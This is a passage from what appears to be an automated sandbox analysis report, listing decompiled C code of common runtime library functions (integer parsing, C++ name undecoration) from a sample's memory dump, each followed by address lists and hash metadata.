															_v8 = _v8 | (_t122 | _t165) << 0x00000002 | 0x00000008;
															_t126 = _a8;
															_t148 =  *_t126;
															_v12 = _t148;
															_a8 = _t126 + 1;
															continue;
														}
														if(__eflags < 0) {
															L54:
															_t122 = 1;
															goto L56;
														}
														__eflags = _t160 - _v20;
														if(_t160 >= _v20) {
															goto L55;
														}
														goto L54;
													}
													if(__eflags > 0) {
														L49:
														_t165 = 1;
														goto L51;
													}
													__eflags = _t150 - _v36;
													if(_t150 <= _v36) {
														goto L50;
													}
													goto L49;
												}
												E0137E7FA( &_a8, _v12);
												_t111 = _v8;
												__eflags = _t111 & 0x00000008;
												if((_t111 & 0x00000008) != 0) {
													_t149 = _v20;
													_t112 = E01383D37(_t111, _t149, _t172);
													__eflags = _t112;
													if(_t112 == 0) {
														__eflags = _v8 & 0x00000002;
														if((_v8 & 0x00000002) != 0) {
															_t149 =  ~_t149;
															asm("adc edi, 0x0");
															_t172 =  ~_t172;
														}
														L73:
														_t174 = _a12;
														__eflags = _t174;
														if(_t174 != 0) {
															 *_t174 = _a8;
														}
														return _t149;
													}
													_t114 = _a4;
													 *((char*)(_t114 + 0x1c)) = 1;
													 *((intOrPtr*)(_t114 + 0x18)) = 0x22;
													_t115 = _v8;
													__eflags = _t115 & 0x00000001;
													if((_t115 & 0x00000001) != 0) {
														_t157 = _a12;
														__eflags = _t115 & 0x00000002;
														if((_t115 & 0x00000002) == 0) {
															__eflags = _t157;
															if(_t157 != 0) {
																_t115 = _a8;
																 *_t157 = _t115;
															}
															return _t115 | 0xffffffff;
														}
														__eflags = _t157;
														if(_t157 != 0) {
															 *_t157 = _a8;
														}
														return 0;
													}
													_t149 = _t149 | 0xffffffff;
													_t172 = _t172 | 0xffffffff;
													goto L73;
												}
												_t119 = _a12;
												__eflags = _t119;
												if(_t119 != 0) {
													 *_t119 = _v44;
												}
												goto L60;
											}
											_t133 = _t148 + 0xffffffc9;
											__eflags = _t133;
											L26:
											__eflags = _t133;
											if(_t133 != 0) {
												goto L35;
											}
											_t134 =  *_t153;
											_t161 = _t153 + 1;
											_v16 = _t134;
											_a8 = _t161;
											__eflags = _t134 - 0x78;
											if(_t134 == 0x78) {
												L32:
												__eflags = _t173;
												if(_t173 == 0) {
													_t173 = 0x10;
												}
												_t148 =  *_t161;
												_t34 = _t161 + 1; // 0x2
												_v12 = _t148;
												_a8 = _t34;
												goto L37;
											}
											__eflags = _t134 - 0x58;
											if(_t134 == 0x58) {
												goto L32;
											}
											__eflags = _t173;
											if(_t173 == 0) {
												_t173 = 8;
											}
											E0137E7FA( &_a8, _v16);
											goto L37;
										}
										_t133 = _t148 + 0xffffffa9;
										goto L26;
									}
									_t133 = _t148 + 0xffffffd0;
									goto L26;
								}
								__eflags = _t173 - 0x10;
								if(_t173 != 0x10) {
									goto L37;
								}
								goto L20;
							}
							L16:
							_t163 = _a8;
							_t148 =  *_t163;
							_t153 = _t163 + 1;
							_v12 = _t148;
							_a8 = _t153;
							goto L18;
						}
						_v8 = _t94 | 0x00000002;
						goto L16;
					}
					_t175 = _v16;
					do {
						_t140 = _a8;
						_t148 =  *_t140;
						_a8 = _t140 + 1;
						_v12 = _t148;
						_t143 = E013827BE(_t148, _t165, _t172, _t175, _t148 & 0x000000ff, 8, _t175);
						_t177 = _t177 + 0xc;
						__eflags = _t143;
					} while (_t143 != 0);
					_t173 = _a16;
					goto L13;
				} else {
					_t145 = _a4;
					 *((char*)(_t145 + 0x1c)) = 1;
					 *((intOrPtr*)(_t145 + 0x18)) = 0x16;
					L01364E5B(_t171, 0, 0, 0, 0, 0, _t145);
					goto L5;
				}
			}




















































                                                                                              0x01382df4
                                                                                              0x01382e25
                                                                                              0x01382e25
                                                                                              0x01382e2a
                                                                                              0x01382e33
                                                                                              0x01382e33
                                                                                              0x01383024
                                                                                              0x00000000
                                                                                              0x01383026
                                                                                              0x01382df6
                                                                                              0x01382dfb
                                                                                              0x01382e3a
                                                                                              0x01382e3d
                                                                                              0x01382e3f
                                                                                              0x01382e43
                                                                                              0x01382e46
                                                                                              0x01382e49
                                                                                              0x01382e4c
                                                                                              0x01382e4f
                                                                                              0x01382e52
                                                                                              0x01382e56
                                                                                              0x01382e5a
                                                                                              0x01382e5f
                                                                                              0x01382e5f
                                                                                              0x01382e62
                                                                                              0x01382e66
                                                                                              0x01382e6f
                                                                                              0x01382e74
                                                                                              0x01382e77
                                                                                              0x01382e79
                                                                                              0x01382ea0
                                                                                              0x01382ea0
                                                                                              0x01382ea4
                                                                                              0x01382ea7
                                                                                              0x01382eaa
                                                                                              0x01382eb4
                                                                                              0x01382eb7
                                                                                              0x01382ec7
                                                                                              0x01382eca
                                                                                              0x01382eca
                                                                                              0x01382ecc
                                                                                              0x01382ed3
                                                                                              0x01382ed7
                                                                                              0x01382ed9
                                                                                              0x01382ee7
                                                                                              0x01382ee9
                                                                                              0x01382ef7
                                                                                              0x01382ef9
                                                                                              0x01382f3e
                                                                                              0x01382f3e
                                                                                              0x01382f40
                                                                                              0x01382f44
                                                                                              0x01382f44
                                                                                              0x01382f45
                                                                                              0x01382f45
                                                                                              0x01382f47
                                                                                              0x01382f48
                                                                                              0x01382f4a
                                                                                              0x01382f53
                                                                                              0x01382f5b
                                                                                              0x01382f5e
                                                                                              0x01382f61
                                                                                              0x01382f65
                                                                                              0x01382f67
                                                                                              0x01382f75
                                                                                              0x01382f77
                                                                                              0x01382f83
                                                                                              0x01382f85
                                                                                              0x01382f87
                                                                                              0x01382f91
                                                                                              0x01382f91
                                                                                              0x01382f89
                                                                                              0x01382f8c
                                                                                              0x01382f8c
                                                                                              0x01382f79
                                                                                              0x01382f7c
                                                                                              0x01382f7c
                                                                                              0x01382f69
                                                                                              0x01382f6c
                                                                                              0x01382f6c
                                                                                              0x01382f94
                                                                                              0x01382f97
                                                                                              0x01382f99
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x01382f9b
                                                                                              0x01382fae
                                                                                              0x01382fb3
                                                                                              0x01382fb6
                                                                                              0x01382fb9
                                                                                              0x01382fbb
                                                                                              0x01382fbe
                                                                                              0x01382fc1
                                                                                              0x01382fcf
                                                                                              0x01382fcf
                                                                                              0x01382fcf
                                                                                              0x01382fd1
                                                                                              0x01382fd1
                                                                                              0x01382fd4
                                                                                              0x01382fe2
                                                                                              0x01382fe2
                                                                                              0x01382fe2
                                                                                              0x01382fe4
                                                                                              0x01382fe4
                                                                                              0x01382fef
                                                                                              0x01382ff2
                                                                                              0x01382ff5
                                                                                              0x01382ff8
                                                                                              0x01382ffb
                                                                                              0x01382ffe
                                                                                              0x00000000
                                                                                              0x01382ffe
                                                                                              0x01382fd6
                                                                                              0x01382fdd
                                                                                              0x01382fdf
                                                                                              0x00000000
                                                                                              0x01382fdf
                                                                                              0x01382fd8
                                                                                              0x01382fdb
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x01382fdb
                                                                                              0x01382fc3
                                                                                              0x01382fca
                                                                                              0x01382fcc
                                                                                              0x00000000
                                                                                              0x01382fcc
                                                                                              0x01382fc5
                                                                                              0x01382fc8
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x01382fc8
                                                                                              0x0138300c
                                                                                              0x01383011
                                                                                              0x01383014
                                                                                              0x01383016
                                                                                              0x0138302a
                                                                                              0x01383030
                                                                                              0x01383038
                                                                                              0x0138303a
                                                                                              0x01383085
                                                                                              0x01383089
                                                                                              0x0138308b
                                                                                              0x0138308d
                                                                                              0x01383090
                                                                                              0x01383090
                                                                                              0x01383092
                                                                                              0x01383092
                                                                                              0x01383095
                                                                                              0x01383097
                                                                                              0x0138309c
                                                                                              0x0138309c
                                                                                              0x00000000
                                                                                              0x013830a0
                                                                                              0x0138303c
                                                                                              0x0138303f
                                                                                              0x01383043
                                                                                              0x0138304a
                                                                                              0x0138304d
                                                                                              0x0138304f
                                                                                              0x01383059
                                                                                              0x0138305c
                                                                                              0x0138305e
                                                                                              0x01383072
                                                                                              0x01383074
                                                                                              0x01383076
                                                                                              0x01383079
                                                                                              0x01383079
                                                                                              0x00000000
                                                                                              0x0138307e
                                                                                              0x01383060
                                                                                              0x01383062
                                                                                              0x01383067
                                                                                              0x01383067
                                                                                              0x00000000
                                                                                              0x0138306b
                                                                                              0x01383051
                                                                                              0x01383054
                                                                                              0x00000000
                                                                                              0x01383054
                                                                                              0x01383018
                                                                                              0x0138301b
                                                                                              0x0138301d
                                                                                              0x01383022
                                                                                              0x01383022
                                                                                              0x00000000
                                                                                              0x0138301d
                                                                                              0x01382efe
                                                                                              0x01382efe
                                                                                              0x01382f01
                                                                                              0x01382f01
                                                                                              0x01382f03
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x01382f05
                                                                                              0x01382f07
                                                                                              0x01382f08
                                                                                              0x01382f0b
                                                                                              0x01382f0e
                                                                                              0x01382f10
                                                                                              0x01382f2a
                                                                                              0x01382f2a
                                                                                              0x01382f2c
                                                                                              0x01382f30
                                                                                              0x01382f30
                                                                                              0x01382f31
                                                                                              0x01382f33
                                                                                              0x01382f36
                                                                                              0x01382f39
                                                                                              0x00000000
                                                                                              0x01382f39
                                                                                              0x01382f12
                                                                                              0x01382f14
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x01382f16
                                                                                              0x01382f18
                                                                                              0x01382f1c
                                                                                              0x01382f1c
                                                                                              0x01382f23
                                                                                              0x00000000
                                                                                              0x01382f23
                                                                                              0x01382eee
                                                                                              0x00000000
                                                                                              0x01382eee
                                                                                              0x01382ede
                                                                                              0x00000000
                                                                                              0x01382ede
                                                                                              0x01382ece
                                                                                              0x01382ed1
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x01382ed1
                                                                                              0x01382eb9
                                                                                              0x01382eb9
                                                                                              0x01382ebc
                                                                                              0x01382ebe
                                                                                              0x01382ebf
                                                                                              0x01382ec2
                                                                                              0x00000000
                                                                                              0x01382ec2
                                                                                              0x01382eaf
                                                                                              0x00000000
                                                                                              0x01382eaf
                                                                                              0x01382e7b
                                                                                              0x01382e7e
                                                                                              0x01382e7e
                                                                                              0x01382e84
                                                                                              0x01382e87
                                                                                              0x01382e8e
                                                                                              0x01382e91
                                                                                              0x01382e96
                                                                                              0x01382e99
                                                                                              0x01382e99
                                                                                              0x01382e9d
                                                                                              0x00000000
                                                                                              0x01382e07
                                                                                              0x01382e07
                                                                                              0x01382e0b
                                                                                              0x01382e0f
                                                                                              0x01382e1d
                                                                                              0x00000000
                                                                                              0x01382e22

                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.302442957.0000000001351000.00000020.00000001.01000000.00000004.sdmp, Offset: 01350000, based on PE: true
                                                                                              • Associated: 00000002.00000002.302434278.0000000001350000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.302498108.0000000001394000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.302524997.000000000139E000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.302537308.00000000013A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_1350000_cmezd.jbxd
                                                                                              Similarity
                                                                                              • API ID: __aulldiv
                                                                                              • String ID: +$-
                                                                                              • API String ID: 3732870572-2137968064
                                                                                              • Opcode ID: 5d3a88a89ae51412bfa0a4c382048c4bb32973f704625ff9050a715af794f098
                                                                                              • Instruction ID: bc4e0802f50d77a3a67c89defd02955fbfe185b572035678cd3e5f0eccdc4bb1
                                                                                              • Opcode Fuzzy Hash: 5d3a88a89ae51412bfa0a4c382048c4bb32973f704625ff9050a715af794f098
                                                                                              • Instruction Fuzzy Hash: 55A1FF70A04359AFDF25EF3CC8506EF7BA5EF55728F088559E8A6AB381D230D906CB50
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0135DAC6 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 100%
                                                                                              			E0135DAC6(void* __fp0, intOrPtr* _a4) {
				char _v5;
				char _v6;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				intOrPtr _v28;
				char* _v32;
				char _v40;
				char _v48;
				char _v56;
				void* __edi;
				void* __esi;
				intOrPtr* _t44;
				intOrPtr* _t49;
				intOrPtr* _t59;
				void* _t62;
				intOrPtr _t63;
				void* _t64;
				void* _t65;
				void* _t66;
				intOrPtr* _t69;
				char _t70;
				intOrPtr _t71;
				char _t72;
				intOrPtr _t74;
				char* _t82;
				intOrPtr _t84;
				char _t85;
				intOrPtr _t86;
				signed int* _t87;
				void* _t96;

				_t96 = __fp0;
				_t72 = 0;
				_v6 = 1;
				_v16 = 0;
				_t70 = 0;
				_v12 = 0;
				 *0x13a0b25 = 1;
				while(1) {
					_t84 =  *((intOrPtr*)( *0x13a0b18));
					if(_t84 == 0 || _t84 == 0x40) {
						break;
					}
					_t46 = _t84 + 0xffffffd0;
					_v24 = _t72;
					_v20 = _t72;
					_v5 = _t72;
					if(_t84 + 0xffffffd0 > 9) {
						_t86 =  *0x13a0b18;
						_t74 = _t86;
						if(_t84 != 0x24 ||  *((intOrPtr*)(_t86 + 1)) != _t84) {
							L12:
							if( *((char*)( *0x13a0b18)) != 0x24) {
								L21:
								_t49 = E0135E04E(_t84, _t85, _t86, _t96,  &_v56);
								L22:
								_t71 =  *((intOrPtr*)(_t49 + 4));
								_t85 =  *_t49;
								_v20 = _t71;
								_v24 = _t85;
								if( *0x13a0b18 - _t86 <= 1) {
									goto L27;
								}
								_t87 =  *0x13a0b14;
								if( *_t87 == 9) {
									goto L27;
								}
								if(_t85 == 0) {
									goto L32;
								}
								_t59 = E0135B660(0x13a0b34, 8);
								if(_t59 != 0) {
									 *_t59 = _t85;
									 *((intOrPtr*)(_t59 + 4)) = _t71;
									 *_t87 =  *_t87 + 1;
									 *((intOrPtr*)(_t87 + 4 +  *_t87 * 4)) = _t59;
								}
								goto L27;
							}
							_t82 = _t74 + 1;
							if( *_t82 == 0x24) {
								goto L21;
							}
							 *0x13a0b18 = _t82;
							_t49 = E0135DC76(_t96,  &_v48);
							goto L22;
						} else {
							_t62 =  *((char*)(_t86 + 2)) - 0x24;
							if(_t62 == 0) {
								if( *((char*)(_t86 + 3)) != 0x56) {
									goto L12;
								}
								_t63 = _t86 + 4;
								L20:
								 *0x13a0b18 = _t63;
								goto L34;
							}
							_t64 = _t62 - 0x31;
							if(_t64 == 0) {
								L16:
								_t74 = _t86 + 3;
								 *0x13a0b18 = _t74;
								goto L12;
							}
							_t65 = _t64 - 1;
							if(_t65 == 0) {
								L17:
								_t63 = _t86 + 3;
								goto L20;
							}
							_t66 = _t65 - 1;
							if(_t66 == 0) {
								_v5 = 1;
								goto L16;
							}
							if(_t66 == 3) {
								goto L17;
							}
							goto L12;
						}
					} else {
						 *0x13a0b18 =  *0x13a0b18 + 1;
						_t69 = E0135BF23( *0x13a0b14,  &_v40, _t46);
						_t85 =  *_t69;
						_t71 =  *((intOrPtr*)(_t69 + 4));
						_v24 = _t85;
						_v20 = _t71;
						L27:
						if(_t85 == 0) {
							L32:
							if(_t71 > 1) {
								E0135B826(_a4, 2);
								return _a4;
							}
							L33:
							_t70 = _v12;
							L34:
							_t72 = 0;
							_v6 = 0;
							if(_t70 == 0) {
								continue;
							}
							break;
						}
						if(_v6 == 0) {
							E0135BBD3( &_v16, 0x2c);
						}
						E0135BD24( &_v16,  &_v24);
						if(_v5 != 0) {
							_v32 = "...";
							_v28 = 3;
							E0135BC28( &_v16,  &_v32);
						}
						goto L33;
					}
				}
				_t44 = _a4;
				 *0x13a0b25 = _t72;
				 *_t44 = _v16;
				 *((intOrPtr*)(_t44 + 4)) = _t70;
				return _t44;
			}



































                                                                                              0x0135dac6
                                                                                              0x0135dacd
                                                                                              0x0135dacf
                                                                                              0x0135dad5
                                                                                              0x0135dad8
                                                                                              0x0135dada
                                                                                              0x0135dadd
                                                                                              0x0135dae4
                                                                                              0x0135dae9
                                                                                              0x0135daed
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0135daff
                                                                                              0x0135db02
                                                                                              0x0135db05
                                                                                              0x0135db08
                                                                                              0x0135db0e
                                                                                              0x0135db36
                                                                                              0x0135db3c
                                                                                              0x0135db41
                                                                                              0x0135db65
                                                                                              0x0135db6d
                                                                                              0x0135dbad
                                                                                              0x0135dbb1
                                                                                              0x0135dbb6
                                                                                              0x0135dbb6
                                                                                              0x0135dbb9
                                                                                              0x0135dbc2
                                                                                              0x0135dbc5
                                                                                              0x0135dbcc
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0135dbce
                                                                                              0x0135dbd7
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0135dbdb
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0135dbe4
                                                                                              0x0135dbeb
                                                                                              0x0135dbed
                                                                                              0x0135dbef
                                                                                              0x0135dbf2
                                                                                              0x0135dbf6
                                                                                              0x0135dbf6
                                                                                              0x00000000
                                                                                              0x0135dbeb
                                                                                              0x0135db6f
                                                                                              0x0135db73
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0135db78
                                                                                              0x0135db7f
                                                                                              0x00000000
                                                                                              0x0135db48
                                                                                              0x0135db4c
                                                                                              0x0135db4f
                                                                                              0x0135db9e
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0135dba0
                                                                                              0x0135dba3
                                                                                              0x0135dba3
                                                                                              0x00000000
                                                                                              0x0135dba3
                                                                                              0x0135db51
                                                                                              0x0135db54
                                                                                              0x0135db8a
                                                                                              0x0135db8a
                                                                                              0x0135db8d
                                                                                              0x00000000
                                                                                              0x0135db8d
                                                                                              0x0135db56
                                                                                              0x0135db59
                                                                                              0x0135db95
                                                                                              0x0135db95
                                                                                              0x00000000
                                                                                              0x0135db95
                                                                                              0x0135db5b
                                                                                              0x0135db5e
                                                                                              0x0135db86
                                                                                              0x00000000
                                                                                              0x0135db86
                                                                                              0x0135db63
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0135db63
                                                                                              0x0135db10
                                                                                              0x0135db16
                                                                                              0x0135db21
                                                                                              0x0135db26
                                                                                              0x0135db28
                                                                                              0x0135db2b
                                                                                              0x0135db2e
                                                                                              0x0135dbfa
                                                                                              0x0135dbfc
                                                                                              0x0135dc3c
                                                                                              0x0135dc3f
                                                                                              0x0135dc6c
                                                                                              0x00000000
                                                                                              0x0135dc71
                                                                                              0x0135dc41
                                                                                              0x0135dc41
                                                                                              0x0135dc44
                                                                                              0x0135dc44
                                                                                              0x0135dc46
                                                                                              0x0135dc4b
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0135dc4b
                                                                                              0x0135dc02
                                                                                              0x0135dc09
                                                                                              0x0135dc09
                                                                                              0x0135dc15
                                                                                              0x0135dc1e
                                                                                              0x0135dc23
                                                                                              0x0135dc2e
                                                                                              0x0135dc35
                                                                                              0x0135dc35
                                                                                              0x00000000
                                                                                              0x0135dc1e
                                                                                              0x0135db0e
                                                                                              0x0135dc51
                                                                                              0x0135dc54
                                                                                              0x0135dc5d
                                                                                              0x0135dc5f
                                                                                              0x00000000

                                                                                              APIs
                                                                                              • Replicator::operator[].LIBCMT ref: 0135DB21
                                                                                              • DName::DName.LIBVCRUNTIME ref: 0135DC6C
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.302442957.0000000001351000.00000020.00000001.01000000.00000004.sdmp, Offset: 01350000, based on PE: true
                                                                                              • Associated: 00000002.00000002.302434278.0000000001350000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.302498108.0000000001394000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.302524997.000000000139E000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.302537308.00000000013A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_1350000_cmezd.jbxd
                                                                                              Similarity
                                                                                              • API ID: NameName::Replicator::operator[]
                                                                                              • String ID: ...
                                                                                              • API String ID: 3707554701-440645147
                                                                                              • Opcode ID: 311d2202bc51ca94ea0637d4143b1a294a41564491eca06003757c6eba59b7f8
                                                                                              • Instruction ID: f83f83f11b062d52010487b7c630d71ba225b4f8f73ea44cead69c81c975ed98
                                                                                              • Opcode Fuzzy Hash: 311d2202bc51ca94ea0637d4143b1a294a41564491eca06003757c6eba59b7f8
                                                                                              • Instruction Fuzzy Hash: E151BF719042499FDB69CFECD184EAEFFFAAB09B08F04809AD94297345D771D644CB90
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 01354485 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 83COMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 45%
                                                                                              			E01354485(void* __edi, intOrPtr* _a4, intOrPtr _a8) {
				char _v8;
				intOrPtr _v12;
				char _v16;
				intOrPtr _t16;
				intOrPtr _t21;
				intOrPtr _t22;
				char* _t30;
				char _t32;
				intOrPtr* _t36;
				void* _t37;
				void* _t41;
				void* _t43;
				char _t44;
				intOrPtr* _t47;

				_t43 = __edi;
				_t34 = _a4;
				_t16 =  *_a4;
				if(_t16 != 0) {
					return _t16;
				}
				_t32 = 0;
				_t47 = E0135B461(0, _t34 + 5, 0, 0x1354583, L0135459C, 0x2800);
				if(_t47 == 0) {
					L13:
					E0135B2EA(_t47);
					return _t32;
				}
				_t36 = _t47;
				_t3 = _t36 + 1; // 0x1
				_t41 = _t3;
				do {
					_t21 =  *_t36;
					_t36 = _t36 + 1;
				} while (_t21 != 0);
				_t37 = _t36 - _t41;
				if(_t37 == 0) {
					L8:
					_t5 = _t37 + 1; // 0x1
					_t22 = _t5;
					_v12 = _t22;
					_push(_t43);
					_push(_t22 + 4);
					_t44 = E0135B305();
					if(_t44 != 0) {
						_t8 = _t44 + 4; // 0x4
						_v16 = _t44;
						_v8 = _t8;
						 *_t44 = _t32;
						E0135B310(_t8, _v12, _t47);
						asm("lock cmpxchg [edx], ecx");
						if(0 == 0) {
							_t44 = _t32;
							__imp__InterlockedPushEntrySList(_a8, _v16);
							_t32 = _v8;
						} else {
							_t32 = 0;
						}
					}
					E0135B2EA(_t44);
					goto L13;
				}
				_t4 = _t47 - 1; // -1
				_t30 = _t4 + _t37;
				while( *_t30 == 0x20) {
					 *_t30 = _t32;
					_t30 = _t30 - 1;
					_t37 = _t37 - 1;
					if(_t37 != 0) {
						continue;
					}
					goto L8;
				}
				goto L8;
			}

















                                                                                              0x01354485
                                                                                              0x01354488
                                                                                              0x0135448e
                                                                                              0x01354493
                                                                                              0x0135454a
                                                                                              0x0135454a
                                                                                              0x013544aa
                                                                                              0x013544b7
                                                                                              0x013544be
                                                                                              0x0135453e
                                                                                              0x0135453f
                                                                                              0x00000000
                                                                                              0x01354548
                                                                                              0x013544c0
                                                                                              0x013544c2
                                                                                              0x013544c2
                                                                                              0x013544c5
                                                                                              0x013544c5
                                                                                              0x013544c7
                                                                                              0x013544c8
                                                                                              0x013544cc
                                                                                              0x013544ce
                                                                                              0x013544e2
                                                                                              0x013544e2
                                                                                              0x013544e2
                                                                                              0x013544e5
                                                                                              0x013544eb
                                                                                              0x013544ec
                                                                                              0x013544f2
                                                                                              0x013544f7
                                                                                              0x013544fd
                                                                                              0x01354500
                                                                                              0x01354504
                                                                                              0x01354507
                                                                                              0x01354509
                                                                                              0x01354519
                                                                                              0x0135451f
                                                                                              0x01354528
                                                                                              0x0135452d
                                                                                              0x01354533
                                                                                              0x01354521
                                                                                              0x01354521
                                                                                              0x01354521
                                                                                              0x0135451f
                                                                                              0x01354537
                                                                                              0x00000000
                                                                                              0x0135453d
                                                                                              0x013544d0
                                                                                              0x013544d3
                                                                                              0x013544d5
                                                                                              0x013544da
                                                                                              0x013544dc
                                                                                              0x013544dd
                                                                                              0x013544e0
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x013544e0
                                                                                              0x00000000

                                                                                              APIs
                                                                                              • ___unDName.LIBVCRUNTIME ref: 013544B2
                                                                                                • Part of subcall function 0135B461: ___unDNameEx.LIBVCRUNTIME ref: 0135B47A
                                                                                              • InterlockedPushEntrySList.KERNEL32(?,?), ref: 0135452D
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.302442957.0000000001351000.00000020.00000001.01000000.00000004.sdmp, Offset: 01350000, based on PE: true
                                                                                              • Associated: 00000002.00000002.302434278.0000000001350000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.302498108.0000000001394000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.302524997.000000000139E000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.302537308.00000000013A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_1350000_cmezd.jbxd
                                                                                              Similarity
                                                                                              • API ID: Name___un$EntryInterlockedListPush
                                                                                              • String ID: Im
                                                                                              • API String ID: 723550680-4136205621
                                                                                              • Opcode ID: 721fcf13db08e0f9e758b91777819d6a7baaa1fd79d4f4d6046be907cd627357
                                                                                              • Instruction ID: 529eb67684f4633b782b922e15e460ac041f2180eee72fa5dc66f6c3a3bb612f
                                                                                              • Opcode Fuzzy Hash: 721fcf13db08e0f9e758b91777819d6a7baaa1fd79d4f4d6046be907cd627357
                                                                                              • Instruction Fuzzy Hash: A5210771500209EFDB699F6CDC40D6EBFA9EF45A5CB24446CEC05AB206FB32DA45C790
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0135D3C7 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 69COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 87%
                                                                                              			E0135D3C7(void* __edx, intOrPtr* _a4, intOrPtr _a8) {
				intOrPtr _v8;
				char _v12;
				intOrPtr _v16;
				char _v20;
				intOrPtr _t21;
				char* _t24;
				intOrPtr* _t25;
				intOrPtr* _t34;
				void* _t35;
				char _t36;
				intOrPtr* _t43;

				_t42 = __edx;
				_t34 =  *0x13a0b18;
				_t21 =  *_t34;
				if(_t21 != 0) {
					if(_t21 < 0x30 || _t21 > 0x39) {
						E0135D1E0(_t42,  &_v20);
						_t24 =  *0x13a0b18;
						_pop(_t35);
						if(_v12 == 0) {
							L12:
							if( *_t24 != 0) {
								_t36 = 0;
								_v8 = 2;
								_v12 = 0;
								_t43 =  &_v12;
							} else {
								_t43 = E0135B826( &_v12, 1);
								_t36 =  *_t43;
							}
							_t25 = _a4;
							 *_t25 = _t36;
							 *((intOrPtr*)(_t25 + 4)) =  *((intOrPtr*)(_t43 + 4));
							return _t25;
						} else {
							_t24 = _t24 + 1;
							 *0x13a0b18 = _t24;
							if(_a8 != 0x42) {
								if(_a8 != 0x41) {
									goto L12;
								} else {
									_push(_v16);
									E01361D6C(_t35, _a4, _v20);
									goto L9;
								}
							} else {
								_push(_v16);
								E01361D10(_t35, _a4, _v20);
								L9:
								goto L2;
							}
						}
					} else {
						 *0x13a0b18 = _t34 + 1;
						asm("cdq");
						E0135B8AF(_a4, __edx, _t21 - 0x2f, __edx);
						goto L2;
					}
				} else {
					E0135B826(_a4, 1);
					L2:
					return _a4;
				}
			}














                                                                                              0x0135d3c7
                                                                                              0x0135d3ca
                                                                                              0x0135d3d3
                                                                                              0x0135d3d7
                                                                                              0x0135d3ea
                                                                                              0x0135d40e
                                                                                              0x0135d417
                                                                                              0x0135d41c
                                                                                              0x0135d41d
                                                                                              0x0135d454
                                                                                              0x0135d457
                                                                                              0x0135d469
                                                                                              0x0135d46b
                                                                                              0x0135d472
                                                                                              0x0135d475
                                                                                              0x0135d459
                                                                                              0x0135d463
                                                                                              0x0135d465
                                                                                              0x0135d465
                                                                                              0x0135d478
                                                                                              0x0135d47b
                                                                                              0x0135d480
                                                                                              0x0135d484
                                                                                              0x0135d41f
                                                                                              0x0135d41f
                                                                                              0x0135d424
                                                                                              0x0135d429
                                                                                              0x0135d442
                                                                                              0x00000000
                                                                                              0x0135d444
                                                                                              0x0135d444
                                                                                              0x0135d44d
                                                                                              0x00000000
                                                                                              0x0135d44d
                                                                                              0x0135d42b
                                                                                              0x0135d42b
                                                                                              0x0135d434
                                                                                              0x0135d439
                                                                                              0x00000000
                                                                                              0x0135d439
                                                                                              0x0135d429
                                                                                              0x0135d3f0
                                                                                              0x0135d3f7
                                                                                              0x0135d400
                                                                                              0x0135d403
                                                                                              0x00000000
                                                                                              0x0135d403
                                                                                              0x0135d3d9
                                                                                              0x0135d3de
                                                                                              0x0135d3e3
                                                                                              0x0135d3e7
                                                                                              0x0135d3e7

                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.302442957.0000000001351000.00000020.00000001.01000000.00000004.sdmp, Offset: 01350000, based on PE: true
                                                                                              • Associated: 00000002.00000002.302434278.0000000001350000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.302498108.0000000001394000.00000002.00000001.01000000.00000004.sdmpDownload File
